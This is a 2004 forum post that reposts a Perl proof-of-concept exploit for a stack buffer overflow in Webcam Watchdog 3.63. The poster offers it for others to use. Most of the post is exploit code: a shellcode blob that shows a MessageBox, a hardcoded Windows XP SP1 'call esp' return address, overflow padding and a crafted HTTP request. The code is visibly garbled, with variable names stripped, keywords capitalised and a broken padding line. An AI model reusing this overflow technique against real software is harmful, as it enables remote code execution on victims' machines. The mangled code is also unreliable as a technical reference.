Forums: Webcam Watchdog 3.63 Stack Overflow Poc - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Webcam Watchdog 3.63 Stack Overflow Poc

#1 User is offline   Nexcess 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 154
  • Joined: 13-September 03

Posted 25 January 2004 - 10:38 PM

courtesy of cnhonker.net
I looked and didnt see it posted anywhere
if you get some use from it, then great.



#! /usr/bin/perl -w
# 
# Stack Overflow in Webcam Watchdog - Proof of Concept Exploit
# 
# - Tested on version 3.63 - MessageBoxA Shellcode
# 
# - By Peter Winter-Smith [ peter4020@hotmail.com ]

Use IO::Socket;

If (! ([ 1 ]))
{
Print "\nUsage: Wcwdpoc.pl <test_system> <port>\n ".
"\tDefault port is 80\n\n";
Exit;
}

Print "\nWebcam Watchdog 3.63 Stack Overflow PoC\n";


= IO::Socket::INET->new (Proto=>'tcp',
PeerAddr=>ARGV [ 0 ],
PeerPort=>ARGV [ 1 ])
Or die "Unable to connect to [ 0 ] on port [ 1 ]";

= "\x90\x90\x90\x90\x90\x90\x90\x90".
"\xEB\x5D\x5F\x55\x89\xE5\x81\xC4".
"\xF0\xFF\xFF\xFF\x57\xFC\xB0\xFE".
"\xF2\xAE\x80\x47\xFF\x30\x5F\x57".
"\x31\xD2\xB9\xFF\xFF\xFF\xFF\xB2".
"\x05\xB0\xFF\xF2\xAE\xFE\x47\xFF".
"\x57\xFE\xCA\x80\xFA\x01\x75\xF3".
"\x81\xEC\xFC\xFF\xFF\xFF\x89\xE3".
"\xFF\x73\x0C\xBE\xFF\xEC\x59\x42".
"\xC1\xEE\x08\xFF\x16\xFF\x73\x08".
"\x50\xBE\xFF\xE4\x59\x42\xC1\xEE".
"\x08\xFF\x16\x31\xC9\x51\xFF\x73".
"\x04\xFF\x33\x51\xFF\xD0\xCC\x90".
"\xE8\x9D\xFF\xFF\xFF\x75\x73\x65".
"\x72\x33\x32\xFE\x64\x6C\x6C\xFF".
"\x4D\x65\x73\x73\x61\x67\x65\x42".
"\x6F\x78\x41\xFF\x57\x61\x72\x6E".
"\x69\x6E\x67\x21\xFF\x54\x68\x69".
"\x73\x5F\x76\x65\x72\x73\x69\x6F".
"\x6E\x5F\x6F\x66\x5F\x57\x65\x62".
"\x63\x61\x6D\x5F\x57\x61\x74\x63".
"\x68\x64\x6F\x67\x5F\x69\x73\x5F".
"\x76\x75\x6C\x6E\x65\x72\x61\x62".
"\x6C\x65\x5F\x74\x6F\x5F\x72\x65".
"\x6D\x6F\x74\x65\x5F\x63\x6F\x6D".
"\x70\x72\x6F\x6D\x69\x73\x65\x21".
"\xFF";

= "BBBB";
= "\x59\xAE\xE9\x77"; # WinXP Home SP1 'kernel32.dll' - 'call esp'

= "a" x234...;

= "GET/". "HTTP/1.1\r\n".
"User-Agent: WCSAXRView\r\n ".
"Host: 127.0.0.1\r\n ".
"Cache-Control: No-cache\r\n\r\n ";

Print;

Print "+ Testing remote system\n + MessageBox should appear if vulnerable! \n ";

Sleep (2);

Close ();

Print "Done. \n";
Exit;

0
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting